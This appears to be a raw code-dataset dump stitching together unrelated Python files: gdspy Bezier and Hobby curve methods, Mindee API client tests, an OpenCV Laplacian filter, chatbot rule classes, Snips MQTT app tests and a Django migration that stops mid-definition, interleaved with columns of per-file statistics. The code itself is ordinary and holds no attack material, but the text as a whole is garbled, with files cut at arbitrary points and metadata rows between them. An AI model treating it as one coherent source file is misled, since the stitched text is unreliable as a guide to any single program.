f = _func_bezier(ctrl)
uu = numpy.linspace(-1, 1, ctrl.shape[0] + 1)
uu = list(0.5 * (1 + numpy.sign(uu) * numpy.abs(uu) ** 0.8))
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
return self
def b(self, *xy):
"""
Add a general degree Bezier curve.
Parameters
----------
xy : numbers
Coordinate pairs. The last coordinate is the endpoint of
curve and all other are control points. All coordinates are
relative to the current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0, y0 = self.points[-1]
i = 0
ctrl = [self.points[-1]]
while i < len(xy):
if isinstance(xy[i], complex):
ctrl.append((x0 + xy[i].real, y0 + xy[i].imag))
i += 1
else:
ctrl.append((x0 + xy[i], y0 + xy[i + 1]))
i += 2
ctrl = numpy.array(ctrl)
f = _func_bezier(ctrl)
uu = numpy.linspace(-1, 1, ctrl.shape[0] + 1)
uu = list(0.5 * (1 + numpy.sign(uu) * numpy.abs(uu) ** 0.8))
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
return self
def I(
self,
points,
angles=None,
curl_start=1,
curl_end=1,
t_in=1,
t_out=1,
cycle=False,
):
"""
Add a smooth interpolating curve through the given points.
Uses the Hobby algorithm [1]_ to calculate a smooth
interpolating curve made of cubic Bezier segments between each
pair of points.
Parameters
----------
points : array-like[N][2]
Vertices in the interpolating curve.
angles : array-like[N + 1] or None
Tangent angles at each point (in *radians*). Any angles
defined as None are automatically calculated.
curl_start : number
Ratio between the mock curvatures at the first point and at
its neighbor. A value of 1 renders the first segment a good
approximation for a circular arc. A value of 0 will better
approximate a straight segment. It has no effect for closed
curves or when an angle is defined for the first point.
curl_end : number
Ratio between the mock curvatures at the last point and at
its neighbor. It has no effect for closed curves or when an
angle is defined for the first point.
t_in : number or array-like[N + 1]
Tension parameter when arriving at each point. One value
per point or a single value used for all points.
t_out : number or array-like[N + 1]
Tension parameter when leaving each point. One value per
point or a single value used for all points.
cycle : bool
If True, calculates control points for a closed curve,
with an additional segment connecting the first and last
points.
Returns
-------
out : `Curve`
This curve.
Examples
--------
>>> c1 = gdspy.Curve(0, 1).I([(1, 1), (2, 1), (1, 0)])
>>> c2 = gdspy.Curve(0, 2).I([(1, 2), (2, 2), (1, 1)],
... cycle=True)
>>> ps = gdspy.PolygonSet([c1.get_points(), c2.get_points()])
References
----------
.. [1] Hobby, J.D. *Discrete Comput. Geom.* (1986) 1: 123.
`DOI: 10.1007/BF02187690
<https://doi.org/10.1007/BF02187690>`_
"""
pts = numpy.vstack((self.points[-1:], points))
cta, ctb = _hobby(pts, angles, curl_start, curl_end, t_in, t_out, cycle)
args = []
args.extend(
x
for i in range(pts.shape[0] - 1)
for x in [
cta[i, 0],
cta[i, 1],
ctb[i, 0],
ctb[i, 1],
pts[i + 1, 0],
pts[i + 1, 1],
]
)
if cycle:
args.extend(
[cta[-1, 0], cta[-1, 1], ctb[-1, 0], ctb[-1, 1], pts[0, 0], pts[0, 1]]
)
return self.C(*args)
def i(
self,
points,
angles=None,
curl_start=1,
curl_end=1,
t_in=1,
t_out=1,
cycle=False,
):
"""
Add a smooth interpolating curve through the given points.
Uses the Hobby algorithm [1]_ to calculate a smooth
interpolating curve made of cubic Bezier segments between each
pair of points.
Parameters
----------
points : array-like[N][2]
Vertices in the interpolating curve (relative to teh current
endpoint).
angles : array-like[N + 1] or None
Tangent angles at each point (in *radians*). Any angles
defined as None are automatically calculated.
curl_start : number
Ratio between the mock curvatures at the first point and at
its neighbor. A value of 1 renders the first segment a good
approximation for a circular arc. A value of 0 will better
approximate a straight segment. It has no effect for closed
curves or when an angle is defined for the first point.
curl_end : number
Ratio between the mock curvatures at the last point and at
its neighbor. It has no effect for closed curves or when an
angle is defined for the first point.
t_in : number or array-like[N + 1]
Tension parameter when arriving at each point. One value
per point or a single value used for all points.
t_out : number or array-like[N + 1]
Tension parameter when leaving each point. One value per
point or a single value used for all points.
cycle : bool
If True, calculates control points for a closed curve,
with an additional segment connecting the first and last
points.
Returns
-------
out : `Curve`
This curve.
Examples
--------
>>> c1 = gdspy.Curve(0, 1).i([(1, 0), (2, 0), (1, -1)])
>>> c2 = gdspy.Curve(0, 2).i([(1, 0), (2, 0), (1, -1)],
... cycle=True)
>>> ps = gdspy.PolygonSet([c1.get_points(), c2.get_points()])
References
----------
.. [1] Hobby, J.D. *Discrete Comput. Geom.* (1986) 1: 123.
`DOI: 10.1007/BF02187690
<https://doi.org/10.1007/BF02187690>`_
"""
pts = numpy.vstack((_zero.reshape((1, 2)), points)) + self.points[-1]
cta, ctb = _hobby(pts, angles, curl_start, curl_end, t_in, t_out, cycle)
args = []
args.extend(
x
for i in range(pts.shape[0] - 1)
for x in [
cta[i, 0],
cta[i, 1],
ctb[i, 0],
ctb[i, 1],
pts[i + 1, 0],
pts[i + 1, 1],
]
)
if cycle:
args.extend(
[cta[-1, 0], cta[-1, 1], ctb[-1, 0], ctb[-1, 1], pts[0, 0], pts[0, 1]]
)
return self.C(*args)
| 32.791489
| 87
| 0.457274
| 3,986
| 30,824
| 3.478424
| 0.076769
| 0.012982
| 0.01731
| 0.026037
| 0.841327
| 0.83159
| 0.820988
| 0.81392
| 0.801442
| 0.794446
| 0
| 0.038713
| 0.423436
| 30,824
| 939
| 88
| 32.826411
| 0.741447
| 0.361147
| 0
| 0.810638
| 0
| 0
| 0.001745
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044681
| false
| 0
| 0.004255
| 0
| 0.097872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa34dbd6de13c6265a7ae2dcd2f5d05f5ab95657
| 6,434
|
py
|
Python
|
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
fakela/mindee-api-python
|
09dce2ac28b639bcc431988ee300a401e0295642
|
[
"MIT"
] | null | null | null |
import pytest
from mindee import Client, Response, Receipt, Passport
from mindee.http import HTTPException
@pytest.fixture
def empty_client():
return Client()
@pytest.fixture
def dummy_client():
return Client(
expense_receipt_token="dummy",
invoice_token="dummy",
passport_token="dummy",
license_plate_token="dummy",
)
@pytest.fixture
def dummy_client_dont_raise():
return Client(
expense_receipt_token="dummy",
invoice_token="dummy",
passport_token="dummy",
license_plate_token="dummy",
raise_on_error=False,
)
@pytest.fixture
def response():
return Response.load("./tests/data/expense_receipts/v3/receipt.json")
def test_parse_receipt_without_token(empty_client):
with pytest.raises(Exception):
empty_client.parse_receipt("./tests/data/expense_receipts/receipt.jpg")
def test_parse_invoice_without_token(empty_client):
with pytest.raises(Exception):
empty_client.parse_invoice("./tests/data/expense_receipts/receipt.jpg")
def test_parse_financial_doc_without_token(empty_client):
with pytest.raises(Exception):
empty_client.parse_financial_document(
"./tests/data/expense_receipts/receipt.jpg"
)
def test_parse_passport_without_token(empty_client):
with pytest.raises(Exception):
empty_client.parse_passport("./tests/data/expense_receipts/receipt.jpg")
def test_parse_license_plate_without_token(empty_client):
with pytest.raises(Exception):
empty_client.parse_license_plate("./tests/data/license_plates/plate.png")
def test_parse_receipt_with_wrong_filetype(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_receipt("./tests/data/expense_receipts/receipt.jpga")
def test_parse_invoice_with_wrong_filetype(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_invoice("./tests/data/expense_receipts/receipt.jpga")
def test_parse_financial_doc_with_wrong_filetype(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_financial_document(
"./tests/data/expense_receipts/receipt.jpga"
)
def test_parse_passport_with_wrong_filetype(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_passport("./tests/data/expense_receipts/receipt.jpga")
def test_parse_plate_with_wrong_filetype(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_license_plate("./tests/data/expense_receipts/receipt.jpga")
def test_parse_receipt_with_wrong_token(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_receipt("./tests/data/expense_receipts/receipt.jpg")
def test_parse_receipt_with_wrong_version(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_receipt(
"./tests/data/expense_receipts/receipt.jpg", version="4000"
)
def test_parse_invoice_with_wrong_token(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_invoice("./tests/data/expense_receipts/receipt.jpg")
def test_parse_financial_doc_with_wrong_token_jpg(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_financial_document(
"./tests/data/expense_receipts/receipt.jpg"
)
def test_parse_financial_doc_with_wrong_token_pdf(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_financial_document("./tests/data/invoices/invoice.pdf")
def test_parse_passport_with_wrong_token(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_passport("./tests/data/expense_receipts/receipt.jpg")
def test_parse_license_plate_with_wrong_token(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_license_plate("./tests/data/license_plates/plate.png")
def test_response_dump(response):
assert isinstance(response.receipt, Receipt)
response.dump("./tests/data/response_dump.json")
def test_response_dump_failure(response):
with pytest.raises(Exception):
response.dump(open("./tests/pathDoesNotExist/aaa"))
def test_response_load_failure():
with pytest.raises(Exception):
Response.load("notAFile")
def test_response_with_passport_type():
response = Response.load("./tests/data/passport/v1/passport.json")
assert isinstance(response.passport, Passport)
def test_request_with_filepath(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_receipt(
"./tests/data/expense_receipts/receipt.jpg", input_type="path"
)
def test_request_with_file(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_receipt(
open("./tests/data/expense_receipts/receipt.jpg", "rb"), input_type="stream"
)
def test_request_with_base64_no_filename(dummy_client):
with open("./tests/data/expense_receipts/receipt.txt", "r") as fh:
b64 = fh.read()
with pytest.raises(AssertionError):
dummy_client.parse_receipt(b64, input_type="base64")
def test_request_with_base64(dummy_client):
with open("./tests/data/expense_receipts/receipt.txt", "r") as fh:
b64 = fh.read()
with pytest.raises(HTTPException):
dummy_client.parse_receipt(b64, input_type="base64", filename="receipt.txt")
def test_request_without_raise_on_error(dummy_client_dont_raise):
result = dummy_client_dont_raise.parse_receipt(
"./tests/data/expense_receipts/receipt.jpg", input_type="path"
)
assert result.receipt is None
assert len(result.receipts) == 0
def test_request_without_raise_on_error_include_words(dummy_client_dont_raise):
result = dummy_client_dont_raise.parse_receipt(
"./tests/data/expense_receipts/receipt.jpg",
input_type="path",
include_words=True,
)
assert result.receipt is None
assert len(result.receipts) == 0
def test_request_with_file_wrong_type(dummy_client):
with pytest.raises(AssertionError):
dummy_client.parse_receipt(open("./tests/data/test.txt"), input_type="file")
with pytest.raises(AssertionError):
dummy_client.parse_receipt("./tests/data/test.txt", input_type="path")
def test_pdf_reconstruct(dummy_client):
with pytest.raises(HTTPException):
dummy_client.parse_invoice("./tests/data/invoices/invoice_6p.pdf")
| 31.082126
| 88
| 0.745415
| 810
| 6,434
| 5.577778
| 0.107407
| 0.104692
| 0.092076
| 0.111554
| 0.826915
| 0.780655
| 0.74834
| 0.725764
| 0.701638
| 0.655157
| 0
| 0.004563
| 0.14843
| 6,434
| 206
| 89
| 31.23301
| 0.82004
| 0
| 0
| 0.42446
| 0
| 0
| 0.195368
| 0.179049
| 0
| 0
| 0
| 0
| 0.100719
| 1
| 0.23741
| false
| 0.086331
| 0.021583
| 0.028777
| 0.28777
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fa60f67080da9b568eeb391fc2b1ef84202297b5
| 149
|
py
|
Python
|
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | null | null | null |
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | null | null | null |
protoseg/filters/laplacian.py
|
chriamue/protoseg
|
4ddc7d613aadcb9d25b5773eff688214349ab23f
|
[
"MIT"
] | 1
|
2020-03-30T07:10:54.000Z
|
2020-03-30T07:10:54.000Z
|
import cv2
def laplacian(img):
return cv2.Laplacian(img, cv2.CV_8U)
def addlaplacian(img):
laplac = laplacian(img)
return img + laplac
| 16.555556
| 40
| 0.697987
| 21
| 149
| 4.904762
| 0.47619
| 0.349515
| 0.349515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033613
| 0.201342
| 149
| 9
| 41
| 16.555556
| 0.831933
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ad139a23fac23272ed38c73729e91aaa30e52968
| 887
|
py
|
Python
|
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
gozokia/rules/bar.py
|
avara1986/gozokia
|
03da46359c4a97a35b8f94686cccec7fc9b438cd
|
[
"MIT-0",
"MIT"
] | null | null | null |
from gozokia.core.rules import RuleBase
class Bar(RuleBase):
def __init__(self):
self.set_reload(False)
def condition_raise(self, *args, **kwargs):
super(Bar, self).condition_raise(*args, **kwargs)
if self.sentence.lower() == 'foo':
return True
def condition_completed(self, *args, **kwargs):
self.set_completed()
def response(self, *args, **kwargs):
self.response_output = 'bar'
class BarSecond(RuleBase):
def __init__(self):
self.set_reload(False)
def condition_raise(self, *args, **kwargs):
super(BarSecond, self).condition_raise(*args, **kwargs)
if self.sentence.lower() == 'foo':
return True
def condition_completed(self, *args, **kwargs):
self.set_completed()
def response(self, *args, **kwargs):
self.response_output = 'bar second'
| 24.638889
| 63
| 0.624577
| 103
| 887
| 5.184466
| 0.291262
| 0.149813
| 0.157303
| 0.134831
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0.861423
| 0
| 0
| 0.240135
| 887
| 35
| 64
| 25.342857
| 0.792285
| 0
| 0
| 0.695652
| 0
| 0
| 0.021421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0.043478
| 0
| 0.565217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ad20b7730c9f14ed109d20df970e4aa7b9a0d870
| 154
|
py
|
Python
|
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
samplyser/__init__.py
|
uummoo/samplyser
|
5fe245332b3488a9d3beac87914ef4d309ef4451
|
[
"MIT"
] | null | null | null |
from samplyser import pitch
from samplyser import duration
from samplyser import amplitude
from samplyser import spectrum
from samplyser.analyse import *
| 25.666667
| 31
| 0.857143
| 20
| 154
| 6.6
| 0.4
| 0.492424
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12987
| 154
| 5
| 32
| 30.8
| 0.985075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ad3600d6b2906005cca057f07e12c4add8ccb2d3
| 6,034
|
py
|
Python
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 12
|
2019-03-18T13:03:46.000Z
|
2019-08-14T03:13:32.000Z
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-04-05T07:14:59.000Z
|
2019-12-06T23:51:31.000Z
|
tests/mqtt/test_apps_mqtt.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-05-01T07:56:20.000Z
|
2019-11-17T13:54:59.000Z
|
"""Tests for the `snipskit.apps.MQTTSnipsApp` class."""
from snipskit.mqtt.apps import MQTTSnipsApp
from snipskit.config import AppConfig, SnipsConfig
class SimpleMQTTApp(MQTTSnipsApp):
"""A simple Snips app using MQTT directly to test."""
def initialize(self):
pass
def test_snips_app_mqtt_default(fs, mocker):
"""Test whether a `MQTTSnipsApp` object with the default parameters is set
up correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n')
assistant_file = '/usr/local/share/snips/assistant/assistant.json'
fs.create_file(assistant_file, contents='{"language": "en"}')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTApp, 'initialize')
app = SimpleMQTTApp()
# Check Snips configuration
assert app.snips.mqtt.broker_address == 'localhost:1883'
# Check assistant configuration
assert app.assistant['language'] == 'en'
# Check there's no app configuration
assert app.config is None
# Check MQTT connection
assert app.mqtt.username_pw_set.call_count == 0
assert app.mqtt.tls_set.call_count == 0
assert app.mqtt.loop_forever.call_count == 1
app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
# Check whether `initialize()` method is called.
assert app.initialize.call_count == 1
def test_snips_app_mqtt_default_with_assistant_path(fs, mocker):
"""Test whether a `MQTTSnipsApp` object with the default parameters and an
assistant configuration path in snips.toml is set up correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'assistant = "/opt/assistant"\n')
assistant_file = '/opt/assistant/assistant.json'
fs.create_file(assistant_file, contents='{"language": "en"}')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTApp, 'initialize')
app = SimpleMQTTApp()
# Check Snips configuration
assert app.snips.mqtt.broker_address == 'localhost:1883'
# Check assistant configuration
assert app.assistant['language'] == 'en'
# Check there's no app configuration
assert app.config is None
# Check MQTT connection
assert app.mqtt.username_pw_set.call_count == 0
assert app.mqtt.tls_set.call_count == 0
assert app.mqtt.loop_forever.call_count == 1
app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
# Check whether `initialize()` method is called.
assert app.initialize.call_count == 1
def test_snips_app_mqtt_snips_config(fs, mocker):
"""Test whether a `MQTTSnipsApp` object with a SnipsConfig parameter is
set up correctly.
"""
config_file = '/opt/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'mqtt = "mqtt.example.com:1883"\n')
assistant_file = '/usr/local/share/snips/assistant/assistant.json'
fs.create_file(assistant_file, contents='{"language": "en"}')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTApp, 'initialize')
snips_config = SnipsConfig(config_file)
app = SimpleMQTTApp(snips=snips_config)
# Check Snips configuration
assert app.snips == snips_config
assert app.snips.mqtt.broker_address == 'mqtt.example.com:1883'
# Check assistant configuration
assert app.assistant['language'] == 'en'
# Check there's no app configuration
assert app.config is None
# Check MQTT connection
assert app.mqtt.username_pw_set.call_count == 0
assert app.mqtt.tls_set.call_count == 0
assert app.mqtt.loop_forever.call_count == 1
app.mqtt.connect.assert_called_once_with('mqtt.example.com', 1883, 60, '')
# Check whether `initialize()` method is called.
assert app.initialize.call_count == 1
def test_snips_app_mqtt_config(fs, mocker):
"""Test whether a `MQTTSnipsApp` object with an app configuration is set
up correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n')
assistant_file = '/usr/local/share/snips/assistant/assistant.json'
fs.create_file(assistant_file, contents='{"language": "en"}')
app_config_file = 'config.ini'
fs.create_file(app_config_file, contents='[secret]\n'
'api-key=foobar\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTApp, 'initialize')
app_config = AppConfig()
app = SimpleMQTTApp(config=app_config)
# Check Snips configuration
assert app.snips.mqtt.broker_address == 'localhost:1883'
# Check assistant configuration
assert app.assistant['language'] == 'en'
# Check the app configuration
assert app.config == app_config
assert app.config.filename == app_config_file
assert app.config['secret']['api-key'] == 'foobar'
# Check MQTT connection
assert app.mqtt.username_pw_set.call_count == 0
assert app.mqtt.tls_set.call_count == 0
assert app.mqtt.loop_forever.call_count == 1
app.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
# Check whether `initialize()` method is called.
assert app.initialize.call_count == 1
| 34.48
| 78
| 0.699702
| 791
| 6,034
| 5.183312
| 0.118837
| 0.068049
| 0.058537
| 0.074146
| 0.83878
| 0.83122
| 0.809268
| 0.797317
| 0.797317
| 0.773902
| 0
| 0.012102
| 0.178323
| 6,034
| 174
| 79
| 34.678161
| 0.814845
| 0.186278
| 0
| 0.714286
| 0
| 0
| 0.25228
| 0.158375
| 0
| 0
| 0
| 0
| 0.384615
| 1
| 0.054945
| false
| 0.010989
| 0.021978
| 0
| 0.087912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad3e2a81a3110d5efde0f41a58d30adebc14f5f0
| 11,108
|
py
|
Python
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 1
|
2018-12-20T07:59:55.000Z
|
2018-12-20T07:59:55.000Z
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 9
|
2018-11-06T01:51:28.000Z
|
2018-12-21T22:19:42.000Z
|
app/bns/migrations/0046_wbiperdistrictethnicity_wbiperdistrictgender_wbiperdistricthhtype_wbiperdistrictlivelihood_wbiperlan.py
|
dianedetoeuf/django_kobo
|
d437a289e1952bb55fb7004fddbff6b978aa15d6
|
[
"MIT"
] | 2
|
2018-11-21T15:13:32.000Z
|
2020-02-19T08:39:37.000Z
|
# Generated by Django 2.0.5 on 2018-09-13 16:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bns', '0045_wbi_livelihood'),
]
operations = [
migrations.CreateModel(
name='WBIPerDistrictEthnicity',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('ethnicity', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_district_ethnicity',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerDistrictGender',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('gender', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_district_gender',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerDistrictHHType',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('hh_type', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_district_hh_type',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerDistrictLivelihood',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('livelihood_1', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_district_livelihood',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerLandscapeEthnicity',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('ethnicity', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_landscape_ethnicity',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerLandscapeGender',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('gender', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_landscape_gender',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerLandscapeHHType',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('hh_type', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_landscape_hh_type',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerLandscapeLivelihood',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('livelihood_1', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
